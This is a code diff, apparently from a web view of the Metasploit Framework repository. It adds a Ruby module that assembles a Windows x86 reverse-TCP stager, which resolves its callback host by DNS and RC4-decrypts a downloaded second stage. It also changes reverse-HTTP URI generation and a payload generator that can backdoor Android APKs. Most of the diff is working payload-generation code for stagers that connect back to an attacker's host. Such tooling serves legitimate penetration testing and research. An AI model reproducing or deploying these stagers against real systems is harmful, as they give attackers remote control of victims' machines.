||||
pop ebx ; address of S-box
|
||||
pop ecx ; stage length
|
||||
pop ebp ; address of stage
|
||||
push ebp ; push back so we can return into it
|
||||
push edi ; save socket
|
||||
mov edi, ebx ; address of S-box
|
||||
call after_key ; Call after_key, this pushes the address of the key onto the stack.
|
||||
db #{raw_to_db(opts[:rc4key])}
|
||||
after_key:
|
||||
pop esi ; ESI = RC4 key
|
||||
#{asm_decrypt_rc4}
|
||||
pop edi ; restore socket
|
||||
ret ; return into the second stage
|
||||
^
|
||||
|
||||
if opts[:exitfunk]
|
||||
asm << asm_exitfunk(opts)
|
||||
end
|
||||
|
||||
asm
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
@ -0,0 +1,64 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/transport_config'
|
||||
require 'msf/core/payload/windows/reverse_tcp_rc4'
|
||||
require 'msf/core/payload/windows/reverse_tcp_dns'
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
#
|
||||
# Complex reverse_tcp_rc4 payload generation for Windows ARCH_X86
|
||||
#
|
||||
###
|
||||
|
||||
module Payload::Windows::ReverseTcpRc4Dns
|
||||
|
||||
include Msf::Payload::TransportConfig
|
||||
include Msf::Payload::Windows::ReverseTcpRc4
|
||||
include Msf::Payload::Windows::ReverseTcpDns
|
||||
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
host: datastore['LHOST'],
|
||||
retry_count: datastore['ReverseConnectRetries'],
|
||||
xorkey: xorkey,
|
||||
rc4key: rc4key,
|
||||
reliable: false
|
||||
}
|
||||
|
||||
# Generate the advanced stager if we have space
|
||||
unless self.available_space.nil? || required_space > self.available_space
|
||||
conf[:exitfunk] = datastore['EXITFUNC']
|
||||
conf[:reliable] = true
|
||||
end
|
||||
|
||||
generate_reverse_tcp_rc4_dns(conf)
|
||||
end
|
||||
|
||||
#
|
||||
# Generate and compile the stager
|
||||
#
|
||||
def generate_reverse_tcp_rc4_dns(opts={})
|
||||
combined_asm = %Q^
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
#{asm_block_api}
|
||||
start:
|
||||
pop ebp
|
||||
#{asm_reverse_tcp_dns(opts)}
|
||||
#{asm_block_recv_rc4(opts)}
|
||||
^
|
||||
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
@ -55,7 +55,7 @@ module Payload::Windows::ReverseHttp_x64
|
|||
|
||||
# add extended options if we do have enough space
|
||||
unless self.available_space.nil? || required_space > self.available_space
|
||||
conf[:url] = generate_uri
|
||||
conf[:url] = luri + generate_uri
|
||||
conf[:exitfunk] = datastore['EXITFUNC']
|
||||
conf[:ua] = datastore['MeterpreterUserAgent']
|
||||
conf[:proxy_host] = datastore['PayloadProxyHost']
|
||||
|
@ -65,7 +65,7 @@ module Payload::Windows::ReverseHttp_x64
|
|||
conf[:proxy_type] = datastore['PayloadProxyType']
|
||||
else
|
||||
# Otherwise default to small URIs
|
||||
conf[:url] = generate_small_uri
|
||||
conf[:url] = luri + generate_small_uri
|
||||
end
|
||||
|
||||
generate_reverse_http(conf)
|
||||
|
@ -96,7 +96,8 @@ module Payload::Windows::ReverseHttp_x64
|
|||
|
||||
# Choose a random URI length between 30 and 255 bytes
|
||||
if uri_req_len == 0
|
||||
uri_req_len = 30 + rand(256-30)
|
||||
uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
|
||||
|
||||
end
|
||||
|
||||
if uri_req_len < 5
|
||||
|
|
|
@ -9,6 +9,9 @@ module Msf
|
|||
class EncoderSpaceViolation < PayloadGeneratorError
|
||||
end
|
||||
|
||||
class PayloadSpaceViolation < PayloadGeneratorError
|
||||
end
|
||||
|
||||
class IncompatibleArch < PayloadGeneratorError
|
||||
end
|
||||
|
||||
|
@ -284,20 +287,26 @@ module Msf
|
|||
payload_module = framework.payloads.create(payload)
|
||||
payload_module.datastore.merge!(datastore)
|
||||
case format
|
||||
when "raw", "jar"
|
||||
if payload_module.respond_to? :generate_jar
|
||||
payload_module.generate_jar.pack
|
||||
else
|
||||
payload_module.generate
|
||||
end
|
||||
when "war"
|
||||
if payload_module.respond_to? :generate_war
|
||||
payload_module.generate_war.pack
|
||||
else
|
||||
raise InvalidFormat, "#{payload} is not a Java payload"
|
||||
end
|
||||
when "raw", "jar"
|
||||
if payload_module.respond_to? :generate_jar
|
||||
payload_module.generate_jar.pack
|
||||
else
|
||||
raise InvalidFormat, "#{format} is not a valid format for Java payloads"
|
||||
payload_module.generate
|
||||
end
|
||||
when "war"
|
||||
if payload_module.respond_to? :generate_war
|
||||
payload_module.generate_war.pack
|
||||
else
|
||||
raise InvalidFormat, "#{payload} is not a Java payload"
|
||||
end
|
||||
when "axis2"
|
||||
if payload_module.respond_to? :generate_axis2
|
||||
payload_module.generate_axis2.pack
|
||||
else
|
||||
raise InvalidFormat, "#{payload} is not a Java payload"
|
||||
end
|
||||
else
|
||||
raise InvalidFormat, "#{format} is not a valid format for Java payloads"
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -308,20 +317,27 @@ module Msf
|
|||
if platform == "java" or arch == "java" or payload.start_with? "java/"
|
||||
raw_payload = generate_java_payload
|
||||
cli_print "Payload size: #{raw_payload.length} bytes"
|
||||
raw_payload
|
||||
gen_payload = raw_payload
|
||||
elsif payload.start_with? "android/" and not template.blank?
|
||||
cli_print "Using APK template: #{template}"
|
||||
apk_backdoor = ::Msf::Payload::Apk::ApkBackdoor::new()
|
||||
raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload)
|
||||
cli_print "Payload size: #{raw_payload.length} bytes"
|
||||
raw_payload
|
||||
gen_payload = raw_payload
|
||||
else
|
||||
raw_payload = generate_raw_payload
|
||||
raw_payload = add_shellcode(raw_payload)
|
||||
encoded_payload = encode_payload(raw_payload)
|
||||
encoded_payload = prepend_nops(encoded_payload)
|
||||
cli_print "Payload size: #{encoded_payload.length} bytes"
|
||||
format_payload(encoded_payload)
|
||||
gen_payload = format_payload(encoded_payload)
|
||||
end
|
||||
if gen_payload.nil?
|
||||
raise PayloadGeneratorError, 'The payload could not be generated, check options'
|
||||
elsif gen_payload.length > @space and not @smallest
|
||||
raise PayloadSpaceViolation, 'The payload exceeds the specified space'
|
||||
else
|
||||
gen_payload
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -53,7 +53,7 @@ class Msf::Post < Msf::Module
|
|||
mod
|
||||
end
|
||||
|
||||
# This method returns the ID of the {Mdm::Session} that the post module
|
||||
# This method returns the ID of the Mdm::Session that the post module
|
||||
# is currently running against.
|
||||
#
|
||||
# @return [NilClass] if there is no database record for the session
|
||||
|
|
|
@ -136,6 +136,8 @@ module Msf::Post::File
|
|||
end
|
||||
end
|
||||
|
||||
alias :exists? :exist?
|
||||
|
||||
#
|
||||
# Writes a given string to a given local file
|
||||
#
|
||||
|
@ -143,7 +145,7 @@ module Msf::Post::File
|
|||
# @param data [String]
|
||||
# @return [void]
|
||||
def file_local_write(local_file_name, data)
|
||||
unless ::File.exists?(local_file_name)
|
||||
unless ::File.exist?(local_file_name)
|
||||
::FileUtils.touch(local_file_name)
|
||||
end
|
||||
|
||||
|
@ -160,7 +162,7 @@ module Msf::Post::File
|
|||
# @param local_file_name [String] Local file name
|
||||
# @return [String] Hex digest of file contents
|
||||
def file_local_digestmd5(local_file_name)
|
||||
if ::File.exists?(local_file_name)
|
||||
if ::File.exist?(local_file_name)
|
||||
require 'digest/md5'
|
||||
chksum = nil
|
||||
chksum = Digest::MD5.hexdigest(::File.open(local_file_name, "rb") { |f| f.read})
|
||||
|
@ -191,7 +193,7 @@ module Msf::Post::File
|
|||
# @param local_file_name [String] Local file name
|
||||
# @return [String] Hex digest of file contents
|
||||
def file_local_digestsha1(local_file_name)
|
||||
if ::File.exists?(local_file_name)
|
||||
if ::File.exist?(local_file_name)
|
||||
require 'digest/sha1'
|
||||
chksum = nil
|
||||
chksum = Digest::SHA1.hexdigest(::File.open(local_file_name, "rb") { |f| f.read})
|
||||
|
@ -222,7 +224,7 @@ module Msf::Post::File
|
|||
# @param local_file_name [String] Local file name
|
||||
# @return [String] Hex digest of file contents
|
||||
def file_local_digestsha2(local_file_name)
|
||||
if ::File.exists?(local_file_name)
|
||||
if ::File.exist?(local_file_name)
|
||||
require 'digest/sha2'
|
||||
chksum = nil
|
||||
chksum = Digest::SHA256.hexdigest(::File.open(local_file_name, "rb") { |f| f.read})
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue